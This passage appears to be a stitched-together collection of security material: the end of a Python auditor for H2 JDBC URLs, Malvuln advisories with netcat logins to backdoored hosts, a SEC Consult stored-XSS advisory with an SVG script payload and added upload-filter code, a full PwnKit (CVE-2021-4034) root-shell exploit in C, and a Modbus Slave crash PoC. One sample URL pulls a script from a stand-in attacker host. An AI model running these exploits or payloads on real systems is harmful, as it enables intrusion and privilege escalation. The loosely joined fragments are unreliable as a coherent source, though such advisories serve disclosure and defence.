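            continue  # FORBID_CREATION=TRUE is the safe direction
        findings.append((key, f"{key}={settings[key]}: {why}"))
    if leftovers:
        findings.append(("LEFTOVER", f"fragments that are not settings: {leftovers!r}"))
    return findings


def flagged_keys(url):
    """Just the finding keys, in the order audit_h2_url reports them."""
    return [key for key, _ in audit_h2_url(url)]


# The three connection strings from the advisory, used here as sample input.
SAMPLE_URLS = [
    "jdbc:h2:mem:1337;",
    "jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\\",
    "jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;"
    "INIT=RUNSCRIPT FROM 'http://attacker/evil.sql';'\\",
]
```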
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/52d1341f73c34ba2638581469120b68a.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.a<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 1698 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "23706373" is weak and hardcoded within the executable. The malware is packed with UPX and exposes the all-numeric cleartext credentials when decompressed.<br />Type: PE32<br />MD5: 52d1341f73c34ba2638581469120b68a<br />Vuln ID: MVID-2021-0404<br />Dropped files: keygen.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1698<br />Login: 23706373<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#DOS<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS\system32>whoami<br />whoami<br />nt authority\system<br /><br />C:\WINDOWS\system32>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220117-0 ><br />=======================================================================<br />              title: Stored Cross-Site Scripting vulnerability<br />            product: TYPO3 extension "femanager"<br /> vulnerable version: 6.0.0 - 6.3.0 and 5.5.0 and below<br />      fixed version: 6.3.1 and 5.5.1<br />         CVE number: CVE-2021-36787<br />             impact: Medium<br />           homepage: https://www.in2code.de<br />                     https://extensions.typo3.org/extension/femanager<br />              found: 2021-06-01<br />                 by: Lukas Eder (Atos Germany)<br />                     SEC Consult Vulnerability Lab<br /><br />                     An integrated part of SEC Consult, an Atos company<br />                     Europe | Asia | North America<br /><br />                     https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Femanager is an extension for a TYPO3 Frontend-User Registration.<br />Maybe you know sr_feuser_register but you want to use a more modern extension,<br />give femanager a try.<br />This extension basically brings an easy-to-use frontend-user-registration with a<br />profile manager to your system. In addition femanager was developed to be<br />very flexible and to bring a lot of features out of the box."<br /><br />Source: https://docs.typo3.org/p/in2code/femanager/master/en-us/Introduction/Index.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting (CVE-2021-36787)<br />The default configuration of the upload function within the registration workflow<br />of femanager to create new frontend users allows an upload of various file types<br />as profile image.<br /><br />An attacker can use the upload function in the registration process to upload<br />SVG files with embedded JavaScript code that is stored on the webserver.<br />Depending on the developed application, the malicious JavaScript code is<br />executed in the context of other users in various scenarios, e.g. when a user<br />visits the profile of the attacker's frontend user.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting (CVE-2021-36787)<br />The vulnerability can be triggered if the extension's image upload function is<br />used.<br /><br />The following proof of concept shows the crafted HTTP request that was used to<br />create a user with embedded JavaScript code in the SVG file. This SVG file is<br />used as the profile image, which leads to execution every time the image is rendered.<br /><br />HTTP Request:<br />-------------------------------------------------------------------------------<br />POST /login/registrieren?tx_femanager_pi1%5Baction%5D=create&tx_femanager_pi1%5Bcontroller%5D=New&cHash=XXX HTTP/1.1<br />Host: <IP><br />Content-Type: multipart/form-data; boundary=---------------------------222617292530868691744105633415<br />Connection: close<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@extension]"<br /><br />Femanager<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@vendor]"<br /><br />In2code<br /><br />[...]<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][username]"<br /><br />XXX<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][password]"<br /><br />XXX<br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[password_repeat]"<br /><br />XXX<br /><br />[...]<br /><br />-----------------------------222617292530868691744105633415<br />Content-Disposition: form-data; name="tx_femanager_pi1[user][image][0]"; filename="xss_file.svg"<br />Content-Type: image/svg+xml<br /><br /><svg xmlns="http://www.w3.org/2000/svg"><br />  <script>alert("XSS WORKS")</script><br /></svg><br /><br />-----------------------------222617292530868691744105633415<br />-------------------------------------------------------------------------------<br /><br /><br />Tested versions:<br />-----------------------------<br />The following version has been tested:<br />* femanager: 5.4.2 (TYPO3: 9.5.27)<br /><br />The vendor confirmed that the 
following versions are also affected by the vulnerability:<br />* femanager: 6.0.0 - 6.3.0 and 5.5.0 and below<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-05: Contacting vendor through security@typo3.org.<br />2021-07-06: Received information from vendor that they will work on a solution.<br />2021-08-10: Received info from vendor about a released TYPO3 Security Advisory that covers<br /> the vulnerability. The advisory also covers the updated versions of the<br /> extensions that should be used.<br />2022-01-17: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br /><br />Further information can be found at the TYPO3 security advisory:<br />https://typo3.org/security/advisory/typo3-ext-sa-2021-010<br /><br /><br />Workaround:<br />-----------<br />The upload of SVG files can be disabled by adjusting the configuration file of the<br />femanager extension. If SVG files are required for the functions of the website,<br />it must be ensured that malicious code within these files, e.g. in the form<br />of JavaScript, is not executed.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Lukas Eder / @2022<br /><br /><br /></code></pre>
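The workaround in the advisory above leaves the implementation to the site operator. The following is an added example, not code from SEC Consult or the femanager project, of an upload gate that either rejects SVG profile images outright or accepts only SVGs with no script vector; the accepted raster extensions are an assumed site policy.

```python
# Added example, not code from SEC Consult or the femanager extension: an upload
# gate implementing the advisory's workaround (reject SVG profile images, or
# accept only SVGs with no script vector). Use defusedxml in production.
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
RASTER_TYPES = {"png", "jpg", "jpeg", "gif"}  # assumed site policy


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags/attributes."""
    return name.rsplit("}", 1)[-1]


def svg_active_content(data: bytes) -> list[str]:
    """Reasons an SVG would be rejected; empty means no script element,
    on* event handler or javascript: href was found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as err:
        return [f"not well-formed XML: {err}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    reasons = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            reasons.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                reasons.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append(f"javascript: href on <{tag}>")
    return reasons


def accept_profile_image(filename: str, data: bytes, allow_svg: bool = False):
    """Returns (accepted, reason). Default is the advisory's first workaround
    (no SVG at all); allow_svg=True applies the content check instead."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "svg":
        return ext in RASTER_TYPES, f"extension policy for '.{ext}'"
    if not allow_svg:
        return False, "SVG uploads disabled"
    reasons = svg_active_content(data)
    return not reasons, "; ".join(reasons) or "SVG has no active content"


# Constructed samples: the payload shape from the advisory's PoC and a benign icon.
POC_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert("XSS WORKS")</script></svg>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'
```

Even with the content check, serve stored SVGs with a restrictive Content-Security-Policy or only as the source of an `<img>` element, since a sanitizer allow-list is a second line of defence rather than the fix.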
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/290477c9707f64a316888493ae67b1ef.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Antilam.11<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP ports 29559, 47891. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Commands are typically three digits e.g. 001 and perform various actions on the infected host.<br />Type: PE32<br />MD5: 290477c9707f64a316888493ae67b1ef<br />Vuln ID: MVID-2021-0403<br />Dropped files: scandisk.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 47891<br />001<br />001 Windows: C:\WINDOWS<br /> System: C:\WINDOWS\system32<br /> Temp: C:\Users\Victim\AppData\Local\Temp\<br /> Windows: Windows NT 6.2 9200<br /> Windows: 02<br />: DESKTOP-2C3IQHO<br />α: Victim<br /> Windows: English (United States)<br />╨ατ≡: 1547x787<br />NumLock: Off<br />CapsLock: Off<br />ScrollLock: Off<br />╤ΓεßεΣφεσ ∞σ±≥ε φα ΣΦ±Ωσ: 3,722,629,120<br />DESKTOP-2C3IQHO<br />000Taskbar ±Ω≡√δ± ...005<br />000╚ΩεφΩΦ ±Ω≡√ⁿ...006<br />000╫α±√ⁿ...007<br />000Monitor ..008<br />000Ctrl+Alt+Del ...009<br />000ScrollLock ...010<br />000CapsLock ..011<br />000NumLock Γφ...012<br />000CD-ROM ταΩ≡√≥...013<br />000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Γ≡σ∞ ...014<br />000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Σα≥≤...015<br />01508:56 PM|11/17/2021016<br />000Mouse was been unlocked...019<br />020500021<br />021022<br />66022023Shell Experience Host3IQHO\Victim]+ (Administrator)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>/*<br /> * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu><br /> * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034<br /> */<br />#include <stdio.h><br />#include <stdlib.h><br />#include <unistd.h><br /><br />char *shell = <br /> "#include <stdio.h>\n"<br /> "#include <stdlib.h>\n"<br /> "#include <unistd.h>\n\n"<br /> "void gconv() {}\n"<br /> "void gconv_init() {\n"<br /> " setuid(0); setgid(0);\n"<br /> " seteuid(0); setegid(0);\n"<br /> " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"<br /> " exit(0);\n"<br /> "}";<br /><br />int main(int argc, char *argv[]) {<br /> FILE *fp;<br /> system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");<br /> system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");<br /> fp = fopen("pwnkit/pwnkit.c", "w");<br /> fprintf(fp, "%s", shell);<br /> fclose(fp);<br /> system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");<br /> char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };<br /> execve("/usr/bin/pkexec", (char*[]){NULL}, env);<br />}<br /><br /></code></pre>
<pre><code>Vendor has been notified and fixed<br />https://www.modbustools.com/ModSlaveChangeLog.txt<br /><br />tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Steps to reproduce:<br /># 1. - Download and install Modbus Slave<br /># 2. - Run the python script; it will create the modbus.txt file.<br /># 3. - Modbus Slave 7.3.1 < 7.4.2<br /># 4. - Connection -> Connect<br /># 5. - Paste the characters of the txt file into Registration Key<br /># 6. - press "ok" button<br /># 7. - Crashed<br /><br />#!/usr/bin/python<br /><br /># 736 bytes is the length that crashes the Registration Key handler<br />exploit = 'A' * 736<br /><br />try:<br />    file = open("Modbus.txt", "w")<br />    file.write(exploit)<br />    file.close()<br /><br />    print("POC is created")<br />except IOError:<br />    print("POC not created")<br /><br /></code></pre>